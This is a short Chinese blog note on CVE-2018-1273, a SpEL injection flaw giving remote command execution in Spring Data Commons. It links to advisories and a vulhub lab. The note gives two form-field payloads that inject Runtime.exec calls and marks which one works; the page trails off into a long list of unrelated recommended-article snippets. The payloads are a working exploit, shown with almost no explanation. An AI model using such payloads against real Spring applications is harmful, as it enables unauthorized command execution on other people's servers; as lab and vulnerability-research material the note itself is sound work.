growing27
growing27

【漏洞分析】【spring】【CVE-2018-1273】【远程命令执行】spel注入漏洞

https://xz.aliyun.com/t/2269
http://xxlegend.com/2018/04/12/CVE-2018-1273-%20RCE%20with%20Spring%20Data%20Commons%20%E5%88%86%E6%9E%90%E6%8A%A5%E5%91%8A/
https://github.com/vulhub/vulhub/tree/master/spring/CVE-2018-1273

ok

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/gaogaouuu")]=passsword&password=dd&repeatedPassword=dd

not ok

username[T(java.lang.Runtime).getRuntime().exec("touch /tmp/gaogao2")/xxlegend]=passsword&password=dd&repeatedPassword=dd

你可能感兴趣的:(【漏洞分析】【spring】【CVE-2018-1273】【远程命令执行】spel注入漏洞)

  • (超详细)使用git命令行将本地仓库代码上传到gitee/github远程仓库 超翔之逸 分享gitgithub
    最近在上传项目到gitee(github)的时候,总是会遇到各种各样奇奇怪怪的BUG,导致最终无法正确上传项目,于是终于摸索到了一套最简洁和便利的方式利用Git命令行的方式将代码从本地仓库上传到远程仓库。第一步、初始化git进入到你需要上传的项目的目录下,右键找到GitBahHere(安装了Git的小伙伴一般都是可以很轻松得找到),目的是可以直接在当前目录进行初始化,无需再cd寻找目录,麻烦!正在
  • Apollo部署及整合SpringBoot实战 It_BeeCoder SpringBoot
    前言:最近在完成毕业设计,题目是《基于微服务的B2C网上商城系统的设计与实现》,整个项目最早是我在看黑马的培训视频时学习JavaWeb做的一个项目,第一次做完大约在去年过年的时候,这个项目前前后后自己改了差不多5、6次了,使用技术不断更新(还有一些小细节的修改比如最早购物车用Session后来用Redis存储),从最早的Servlet+Filter到SSM+Redis到SpringBoot+Thy
  • 携程开源的分布式apollo技术,整合springboot集成实现动态刷新配置 2401_84584854 程序员java面试学习
    最后这份文档从构建一个键值数据库的关键架构入手,不仅带你建立起全局观,还帮你迅速抓住核心主线。除此之外,还会具体讲解数据结构、线程模型、网络框架、持久化、主从同步和切片集群等,帮你搞懂底层原理。相信这对于所有层次的Redis使用者都是一份非常完美的教程了。整理不易,觉得有帮助的朋友可以帮忙点赞分享支持一下小编~你的支持,我的动力;祝各位前程似锦,offer不断!!!本文已被CODING开源项目:【
  • Spring Boot 整合 Apollo 配置中心实战 m0_51274464 面试学习路线阿里巴巴springboot后端java
    SpringBoot整合Apollo配置中心实战一、Apollo简介二、环境准备三、项目整合步骤四、配置使用示例五、常见问题及解决在分布式系统开发中,配置管理至关重要。Apollo作为携程开源的一款可靠的配置中心,能高效地集中管理应用配置,实现实时更新推送,助力开发者轻松应对复杂多变的配置场景。本文将带你一步步完成SpringBoot项目与Apollo配置中心的整合,让你的应用配置管理如鱼得水。一
  • 基于SpringBoot+Vue的校园跑腿原生小程序 学途源码资源站 Java毕设Java项目springbootvue.js小程序校园跑腿
    系列文章目录1.基于SSM的洗衣房管理系统+原生微信小程序+LW参考示例2.基于SpringBoot的宠物摄影网站管理系统+LW参考示例3.基于SpringBoot+Vue的企业人事管理系统+LW参考示例4.基于SSM的高校实验室管理系统+LW参考示例5.基于SpringBoot的二手数码回收系统+原生微信小程序+LW参考示例6.基于SSM的民宿预订管理系统+LW参考示例7.基于SpringBoo
  • 记一次多线程导入问题排查过程 程序辕日记 javaMySqljavaspringboot
    记一次多线程导入问题排查过程1.需求2.遇到问题3.排查解决问题1.需求大数据量的核对:现在有1000个excel文件,每个excel文件内有21个sheet页,现在要对这些数据进行核对,需要先将这些数据导入到库中,再进行核对。2.遇到问题库使用的是MySql,程序是Java,springcloud生态,在串行导入的时候,导入一次大概需要60分钟,现在对其进行改造,使用多线程导入,其思路为:创建线
  • SQL注入从入门到入狱:万字长文带你领略手工注入的魅力 vortex5 sql数据库网络安全渗透测试安全
    在SQL注入的世界中,灵活而直观的手工注入展现出独特的魅力。相比自动化工具,手工注入不仅能帮助我们深入理解漏洞原理,还能在特定场景下突破工具的局限。本文将从基础SQL函数入手,逐步探讨报错注入、联合注入、布尔盲注和时间盲注等多种手工注入技术。希望通过这篇文章,能让你感受到SQL注入的精妙之处,并在实战中游刃有余。本文以MySQL为例,介绍手工注入原理与实现。一、SQL注入必备函数速览在开始手工注入
  • Spring Boot 整合 Redis 步骤详解 m0_74823094 面试学习路线阿里巴巴springbootredisbootstrap
    文章目录1.引言2.添加依赖3.配置Redis连接信息4.创建Redis操作服务类5.使用RedisTemplate或ReactiveRedisTemplate6.测试Redis功能7.注意事项8.总结Redis是一个高性能的键值存储系统,常用于缓存、消息队列等多种场景。将Redis与SpringBoot结合使用可以极大提升应用的性能和响应速度。本文将详细介绍如何在SpringBoot应用中整合R
  • Java直通车系列28【Spring Boot】(数据访问Spring Data JPA) 浪九天 Java直通车javaspringspringboot开发语言后端
    目录SpringDataJPA概述核心概念1.仓库接口(Repository)2.实体类(Entity)3.方法命名查询4.@Query注解场景示例步骤1:添加依赖步骤2:配置数据库连接步骤3:创建实体类步骤4:创建仓库接口步骤5:创建服务类步骤6:创建控制器类测试示例SpringDataJPA概述SpringDataJPA是Spring提供的一个用于简化JPA(JavaPersistenceAP
  • Java直通车系列27【Spring Boot】(配置文件使用) 浪九天 Java直通车javaspringbootspring后端开发语言
    目录配置文件的作用与格式配置文件的类型配置文件的加载顺序场景示例SpringBoot中配置文件的使用非常灵活和重要,主要有.properties和.yml(.yaml)两种格式:配置文件的作用与格式作用:用于配置SpringBoot应用程序的各种属性,如数据库连接信息、服务器端口、日志级别、自定义属性等,实现对应用行为的定制化。.properties格式:以键值对形式存储配置信息,每行一个键值对,
  • Java直通车系列19【Spring MVC】(国际化支持) 浪九天 Java直通车javaspringmvc开发语言
    目录国际化支持机制概述1.资源束(ResourceBundle)2.MessageSource3.LocaleResolver4.LocaleChangeInterceptor场景示例1.创建资源束文件2.配置MessageSource3.配置LocaleResolver4.配置LocaleChangeInterceptor5.创建控制器和视图解释国际化支持机制概述SpringMVC的国际化支持主
  • Spring setter注入和构造器注入引用数据类型和基本数据类型包括,集合类型的注入 ZZZZJava springjava后端
    setter简单类型注入用valueproperty标签:设置注入属性name属性:设置注入的属性名,实际是set方法对应的名称value属性:设置注入简单类型数据值setter引用类型注入用refproperty标签:设置注入属性name属性:设置注入的属性名,实际是set方法对应的名称ref属性:设置注入引用类型bean的id或name构造器简单类型注入用valueconstructor-ar
  • Spring Cloud相关面试题 努力的搬砖人. java经验分享后端spring笔记
    以下是150道SpringCloud相关面试题:SpringCloud基础概念1.SpringCloud是什么?SpringCloud是一个基于SpringBoot构建的微服务开发工具集,用于简化分布式系统开发,提供服务注册与发现、配置管理、全链路监控等功能。2.SpringCloud的核心组件有哪些?•Eureka:服务注册与发现。•Ribbon:客户端负载均衡。•Feign:声明式REST客户
  • Spring-setter注入和构造器注入 江湖大侠叶开花 SSMspringjavamybatis
    使用setter方法注入简单类型和引用类型先给类中的属性创建setter方法简单类型(基本数据类型和String):在xml文件中使用property标签,name,value属性引用类型:在xml文件中使用property标签,name,ref属性name:对应BookServiceImpl中的属性名ref:对应配置文件中注册的bean的id使用构造器注入简单类型和引用类型先给类创建对应的构造方
  • SQL注入渗透与攻防(四)之文件读写 怰月 Web漏洞sql数据库网络安全
    目录SQL注入之文件读写文件读写注入的原理文件读写注入的条件网站绝对路径读取文件写入文件案列演示之文件读取案列演示之文件写入SQL注入之文件读写文件读写注入的原理文件读写注入的原理就是利用文件的读写权限进行注入,它可以写入一句话木马,也可以读取系统文件的敏感信息。文件读写注入的条件高版本的MYSQL添加了一个新的特性secure_file_priv,该选项限制了mysql导出文件的权限。secur
  • Spring中的依赖注入、setter与构造器注入、自动装配与集合注入详细描述及使用(XML版中篇) KJ.JK JavaEE进阶教程系列Spring中的依赖注入setter与构造器注入集合注入Spring的自动装配Spring的四种依赖注入
    文章目录更多相关知识一、setter注入和构造器注入setter注入—引用类型⭐代码演示setter注入—简单类型(八种基本数据类型+String)⭐代码演示构造器注入—引用类型⭐代码演示构造器注入—简单类型⭐代码演示构造器注入—参数适配⭐type属性参数适配代码演示⭐index属性参数适配代码演示⭕setter注入和构造器注入总结二、自动装配自动装配介绍⭐byType装配演示⚡byType装配注
  • Java Spring 中构造函数注入和setter注入的优缺点 编程小弟 springjavaspring开发语言
    JavaSpring构造函数注入和Setter注入是两种常见的依赖注入方式,它们各有优缺点,适用于不同的场景。构造函数注入优点:强制依赖:构造函数注入在对象创建时就要求所有必需的依赖项都已提供,这有助于确保对象在初始化时就是完整和可用的。如果缺少任何依赖项,对象将无法创建,这有助于在开发早期发现潜在问题。不可变性:一旦对象通过构造函数初始化,其依赖项就被固定下来,无法更改。这有助于确保对象的内部状
  • SpringBoot 外化配置及加载顺序 ashane1314 springbootpython后端
    SpringBoot的外化配置加载顺序遵循特定的优先级规则,高优先级的配置会覆盖低优先级的。以下是详细的配置源加载顺序及规则:一、配置源的优先级(从高到低)命令行参数通过--key=value传递的参数,如java-jarapp.jar--server.port=8081。SPRING_APPLICATION_JSON属性通过环境变量或系统属性传递的JSON格式配置,如SPRING_APPLICA
  • IOC 篇 ashane1314 java开发语言
    一、概念SpringIOC(InversionofControl,控制反转)是Spring框架的核心特性之一,它是一种设计理念,用于实现对象的创建和依赖关系的管理。以下为你详细介绍:核心概念传统的对象创建方式:在传统的Java开发中,对象的创建和管理通常由程序员在代码中手动完成。例如,当一个类需要依赖另一个类的对象时,通常会在该类中使用new关键字来创建依赖对象。这种方式会导致类与类之间的耦合度较
  • Spring的setter方法注入和构造器注入的对比 蓝黑2020 SpringJavaspringjava
    我们知道,Spring的依赖注入,有setter方法注入,实例变量注入,构造器注入等。Spring官方文档里,提到:依赖注入存在两种主要形式:构造器注入setter方法注入注:其实对于Spring注解,目前最常见的注入方式是实例变量注入,无需setter方法,直接在实例变量上添加@Autowired注解即可,详见我另一篇文档。但是实例变量注入是Spring不推荐的方法,在IntelliJIDEA里
  • Spring依赖注入提示:Field injection is not recommended 小小渔夫 SSM#1----Springspringjava后端
    前言1.介绍今天在调试代码,发现IDEA提示@Autowired为警告(如上图所示),信息为:Fieldinjectionisnotrecommended。什么意思,Spring官方给的说法是:不再推荐使用字段注入。这是为啥?字段注入是我们平时工作中经常使用到的注入,一是简单,二是代码简洁,咋就不推荐了呢?下面我们来一探究竟====>>2.出现原因spring4.0开始不推荐使用属性注入,改为推荐
  • Spring 构造器注入和setter注入的比较 ashane1314 springjavalog4j
    一、比较说明在Spring框架中,构造器注入(ConstructorInjection)和Setter注入(SetterInjection)是实现依赖注入(DI)的两种主要方式。它们的核心区别在于依赖注入的时机、代码设计理念以及适用场景。以下是两者的详细比较:1.核心区别特性构造器注入Setter注入注入方式通过类的构造方法注入依赖。通过Setter方法注入依赖。依赖不可变性依赖通常声明为fina
  • Spring Boot 3 中集成 Swagger 问题:Type javax.servlet.http.HttpServletRequest not present 我命由我12345 后端-问题清单springbootservlet后端javahttpspringjava-ee
    问题与处理策略问题描述io.springfoxspringfox-swagger23.0.0io.springfoxspringfox-swagger-ui3.0.0在SpringBoot3中集成Swagger时,报如下错误java.lang.TypeNotPresentException:Typejavax.servlet.http.HttpServletRequestnotpresent#翻译
  • 每日学Java之一万个为什么 ~Yogi 修炼java开发语言
    文章目录RESTFUL风格设计JSON数据中的返回工具类R浏览器跨域问题及其前后端解决办法SpringMVC基于AOP的功能有哪些SpringMVC声明式异常处理SpringMVC拦截器区别filter不能放行RESTFUL风格设计url:尽量使用名词,如果实在重复使用动词method:GETDELET(区别路径传参:唯一标识,和接受查询字符串:范围查询)POSTPUTparam:response
  • Spring Boot整合Redis详解 光阴不负卿 redisredis
    Redis的Java客户端有很多,例如Jedis、JRedis、SpringDataRedis等,SpringBoot借助于SpringDataRedis为Redis提供了开箱即用的自动化配置,开发者只需要添加相关依赖并配置Redis连接信息即可,具体步骤如下:创建SpringBoot项目:首先创建SpringBoot项目,添加如下依赖:org.springframework.bootspring
  • 每日学习Java之一万个为什么 ~Yogi 修炼学习java开发语言
    文章目录Spring声明式事务配置事务接口PlatformTransactionManagerSpring基于AOP的事务具体实现流程@Transactional细节事务传播行为SpringMVC所需依赖SpringMVC五个组成部分功能及其原理SpringMVCHandler方法注解RequestMappingHandlerAdapter工作原理Handler需要处理的数据格式,以及用于简化参数
  • field.setAccessible(true);代码扫描有安全漏洞,解决方案 码叔义 常规发表java开发语言
    AccessibleObject类是Field、Method和Constructor对象的基类,能够允许反射对象修改访问权限修饰符,绕过由Java访问修饰符提供的访问控制检查。它让程序员能够更改私有字段或调用私有方法,这在通常情况下是不允许的。例如:以下代码片段中,将Field将accessible标记设置为true。Classclazz=User.class;Fieldfield=clazz.g
  • SpringBean的实例创建方式 LDM>W< Java学习javaspring
    说在前面:可能会疑惑之前不是学了两种方式吗:beanFactory和applicationContext。最根本来讲,就是通过工厂模式创建。是的,是工厂模式创建,但又分了两种方式:构造+工厂构造方法其中又分为了无参构造和有参构造。在默认情况下,工厂就是通过无参构造来创建bean的,如果我们提供的是有参构造的话,就需要在配置中添加参数publicServiceImpl(StringchineseNa
  • 【商城实战(18)】后台管理系统基础搭建:从0到1构建电商中枢 奔跑吧邓邓子 商城实战商城实战uniappSpringBoot后台管理系统
    【商城实战】专栏重磅来袭!这是一份专为开发者与电商从业者打造的超详细指南。从项目基础搭建,运用uniapp、ElementPlus、SpringBoot搭建商城框架,到用户、商品、订单等核心模块开发,再到性能优化、安全加固、多端适配,乃至运营推广策略,102章内容层层递进。无论是想深入钻研技术细节,还是探寻商城运营之道,本专栏都能提供从0到1的系统讲解,助力你打造独具竞争力的电商平台,开启电商实战
  • SpringBoot为什么默认使用CGLIB? java1234_小锋 javajava开发语言
    大家好,我是锋哥。今天分享关于【SpringBoot为什么默认使用CGLIB?】面试题。希望对大家有帮助;SpringBoot为什么默认使用CGLIB?1000道互联网大厂Java工程师精选面试题-Java资源分享网SpringBoot默认使用CGLIB(CodeGenerationLibrary)作为代理机制之一,主要是因为CGLIB在一些场景下相比于JDK动态代理具有更好的性能和灵活性,尤其在
  • java观察者模式 3213213333332132 java设计模式游戏观察者模式
    观察者模式——顾名思义,就是一个对象观察另一个对象,当被观察的对象发生变化时,观察者也会跟着变化。 在日常中,我们配java环境变量时,设置一个JAVAHOME变量,这就是被观察者,使用了JAVAHOME变量的对象都是观察者,一旦JAVAHOME的路径改动,其他的也会跟着改动。 这样的例子很多,我想用小时候玩的老鹰捉小鸡游戏来简单的描绘观察者模式。 老鹰会变成观察者,母鸡和小鸡是
  • TFS RESTful API 模拟上传测试 ronin47
           TFS RESTful API 模拟上传测试。    细节参看这里:https://github.com/alibaba/nginx-tfs/blob/master/TFS_RESTful_API.markdown 模拟POST上传一个图片: curl --data-binary @/opt/tfs.png http
  • PHP常用设计模式单例, 工厂, 观察者, 责任链, 装饰, 策略,适配,桥接模式 dcj3sjt126com 设计模式PHP
    // 多态, 在JAVA中是这样用的, 其实在PHP当中可以自然消除, 因为参数是动态的, 你传什么过来都可以, 不限制类型, 直接调用类的方法 abstract class Tiger { public abstract function climb(); } class XTiger extends Tiger { public function climb()
  • hibernate 171815164 Hibernate
    main,save Configuration conf =new Configuration().configure(); SessionFactory sf=conf.buildSessionFactory(); Session sess=sf.openSession(); Transaction tx=sess.beginTransaction(); News a=new
  • Ant实例分析 g21121 ant
            下面是一个Ant构建文件的实例,通过这个实例我们可以很清楚的理顺构建一个项目的顺序及依赖关系,从而编写出更加合理的构建文件。           下面是build.xml的代码: <?xml version="1
  • [简单]工作记录_接口返回405原因 53873039oycg 工作
             最近调接口时候一直报错,错误信息是:       responseCode:405 responseMsg:Method Not Allowed        接口请求方式Post.
  • 关于java.lang.ClassNotFoundException 和 java.lang.NoClassDefFoundError 的区别 程序员是怎么炼成的
       真正完成类的加载工作是通过调用 defineClass来实现的;  而启动类的加载过程是通过调用 loadClass来实现的;  就是类加载器分为加载和定义   protected Class<?> findClass(String name) throws ClassNotFoundExcept
  • JDBC学习笔记-JDBC详细的操作流程 aijuans jdbc
    所有的JDBC应用程序都具有下面的基本流程:  1、加载数据库驱动并建立到数据库的连接。  2、执行SQL语句。  3、处理结果。  4、从数据库断开连接释放资源。 下面我们就来仔细看一看每一个步骤: 其实按照上面所说每个阶段都可得单独拿出来写成一个独立的类方法文件。共别的应用来调用。 1、加载数据库驱动并建立到数据库的连接:   Html代码  St
  • rome创建rss antonyup_2006 tomcatcmsxmlstrutsOpera
    引用 1.RSS标准 RSS标准比较混乱,主要有以下3个系列 RSS 0.9x / 2.0 : RSS技术诞生于1999年的网景公司(Netscape),其发布了一个0.9版本的规范。2001年,RSS技术标准的发展工作被Userland Software公司的戴夫 温那(Dave Winer)所接手。陆续发布了0.9x的系列版本。当W3C小组发布RSS 1.0后,Dave W
  • html表格和表单基础 百合不是茶 html表格表单meta锚点
    第一次用html来写东西,感觉压力山大,每次看见别人发的都是比较牛逼的 再看看自己什么都还不会,   html是一种标记语言,其实很简单都是固定的格式   _----------------------------------------表格和表单 表格是html的重要组成部分,表格用在body里面的 主要用法如下; <table> &
  • ibatis如何传入完整的sql语句 bijian1013 javasqlibatis
            ibatis如何传入完整的sql语句?进一步说,String str ="select * from test_table",我想把str传入ibatis中执行,是传递整条sql语句。         解决办法: <
  • 精通Oracle10编程SQL(14)开发动态SQL bijian1013 oracle数据库plsql
    /* *开发动态SQL */ --使用EXECUTE IMMEDIATE处理DDL操作 CREATE OR REPLACE PROCEDURE drop_table(table_name varchar2) is sql_statement varchar2(100); begin sql_statement:='DROP TABLE '||table_name;
  • 【Linux命令】Linux工作中常用命令 bit1129 linux命令
    不断的总结工作中常用的Linux命令   1.查看端口被哪个进程占用   通过这个命令可以得到占用8085端口的进程号,然后通过ps -ef|grep 进程号得到进程的详细信息   netstat -anp | grep 8085   察看进程ID对应的进程占用的端口号   netstat -anp | grep 进程ID &
  • 优秀网站和文档收集 白糖_ 网站
    集成 Flex, Spring, Hibernate 构建应用程序   性能测试工具-JMeter   Hmtl5-IOCN网站   Oracle精简版教程网站   鸟哥的linux私房菜   Jetty中文文档   50个jquery必备代码片段   swfobject.js检测flash版本号工具
  • angular.extend boyitech AngularJSangular.extendAngularJS API
    angular.extend 复制src对象中的属性去dst对象中. 支持多个src对象. 如果你不想改变一个对象,你可以把dst设为空对象{}: var object = angular.extend({}, object1, object2). 注意: angular.extend不支持递归复制. 使用方法: angular.extend(dst, src); 参数:
  • java-谷歌面试题-设计方便提取中数的数据结构 bylijinnan java
    网上找了一下这道题的解答,但都是提供思路,没有提供具体实现。其中使用大小堆这个思路看似简单,但实现起来要考虑很多。 以下分别用排序数组和大小堆来实现。 使用大小堆: import java.util.Arrays; public class MedianInHeap { /** * 题目:设计方便提取中数的数据结构 * 设计一个数据结构,其中包含两个函数,1.插
  • ajaxFileUpload 针对 ie jquery 1.7+不能使用问题修复版本 Chen.H ajaxFileUploadie6ie7ie8ie9
    jQuery.extend({ handleError: function( s, xhr, status, e ) { // If a local callback was specified, fire it if ( s.error ) { s.error.call( s.context || s, xhr, status, e ); }
  • [机器人制造原则]机器人的电池和存储器必须可以替换 comsci 制造
           机器人的身体随时随地可能被外来力量所破坏,但是如果机器人的存储器和电池可以更换,那么这个机器人的思维和记忆力就可以保存下来,即使身体受到伤害,在把存储器取下来安装到一个新的身体上之后,原有的性格和能力都可以继续维持.....        另外,如果一
  • Oracle Multitable INSERT 的用法 daizj oracle
    转载Oracle笔记-Multitable INSERT 的用法 http://blog.chinaunix.net/uid-8504518-id-3310531.html 一、Insert基础用法 语法:     Insert Into 表名 (字段1,字段2,字段3...)     Values (值1,
  • 专访黑客历史学家George Dyson datamachine on
    20世纪最具威力的两项发明——核弹和计算机出自同一时代、同一群年青人。可是,与大名鼎鼎的曼哈顿计划(第二次世界大战中美国原子弹研究计划)相 比,计算机的起源显得默默无闻。出身计算机世家的历史学家George Dyson在其新书《图灵大教堂》(Turing’s Cathedral)中讲述了阿兰·图灵、约翰·冯·诺依曼等一帮子天才小子创造计算机及预见计算机未来
  • 小学6年级英语单词背诵第一课 dcj3sjt126com englishword
    always 总是 rice 水稻,米饭 before 在...之前 live 生活,居住   usual 通常的 early 早的 begin 开始 month 月份   year 年 last 最后的 east 东方的 high 高的   far 远的 window 窗户 world 世界 than 比...更  
  • 在线IT教育和在线IT高端教育 dcj3sjt126com 教育
    codecademy  http://www.codecademy.com codeschool  https://www.codeschool.com teamtreehouse  http://teamtreehouse.com lynda http://www.lynda.com/ Coursera https://www.coursera.
  • Struts2 xml校验框架所定义的校验文件 蕃薯耀 Struts2 xml校验Struts2 xml校验框架Struts2校验
      >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2015年7月11日 15:54:59 星期六 http://fa
  • mac下安装rar和unrar命令 hanqunfeng mac
    1.下载:http://www.rarlab.com/download.htm 选择 RAR 5.21 for Mac OS X 2.解压下载后的文件 tar -zxvf rarosx-5.2.1.tar 3.cd rar sudo install -c -o $USER unrar /bin #输入当前用户登录密码 sudo install -c -o $USER rar
  • 三种将list转换为map的方法 jackyrong list
      在本文中,介绍三种将list转换为map的方法: 1) 传统方法 假设有某个类如下    class Movie { private Integer rank; private String description; public Movie(Integer rank, String des
  • 年轻程序员需要学习的5大经验 lampcy 工作PHP程序员
    在过去的7年半时间里,我带过的软件实习生超过一打,也看到过数以百计的学生和毕业生的档案。我发现很多事情他们都需要学习。或许你会说,我说的不就是某种特定的技术、算法、数学,或者其他特定形式的知识吗?没错,这的确是需要学习的,但却并不是最重要的事情。他们需要学习的最重要的东西是“自我规范”。这些规范就是:尽可能地写出最简洁的代码;如果代码后期会因为改动而变得凌乱不堪就得重构;尽量删除没用的代码,并添加
  • 评“女孩遭野蛮引产致终身不育 60万赔偿款1分未得”医腐深入骨髓 nannan408
    先来看南方网的一则报道: 再正常不过的结婚、生子,对于29岁的郑畅来说,却是一个永远也无法实现的梦想。从2010年到2015年,从24岁到29岁,一张张新旧不一的诊断书记录了她病情的同时,也清晰地记下了她人生的悲哀。   粗暴手术让人发寒   2010年7月,在酒店做服务员的郑畅发现自己怀孕了,可男朋友却联系不上。在没有和家人商量的情况下,她决定堕胎。   12月5日,
  • 使用jQuery为input输入框绑定回车键事件 VS 为a标签绑定click事件 Everyday都不同 jspinput回车键绑定clickenter
    假设如题所示的事件为同一个,必须先把该js函数抽离出来,该函数定义了监听的处理:   function search() { //监听函数略...... }   为input框绑定回车事件,当用户在文本框中输入搜索关键字时,按回车键,即可触发search():   //回车绑定 $(".search").keydown(fun
  • EXT学习记录 tntxia ext
      1. 准备   (1) 官网:http://www.sencha.com/   里面有源代码和API文档下载。   EXT的域名已经从www.extjs.com改成了www.sencha.com ,但extjs这个域名会自动转到sencha上。   (2)帮助文档:   想要查看EXT的官方文档的话,可以去这里h
  • mybatis3的mapper文件报Referenced file contains errors xingguangsixian mybatis
    最近使用mybatis.3.1.0时无意中碰到一个问题: The errors below were detected when validating the file "mybatis-3-mapper.dtd" via the file "account-mapper.xml". In most cases these errors can be d
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他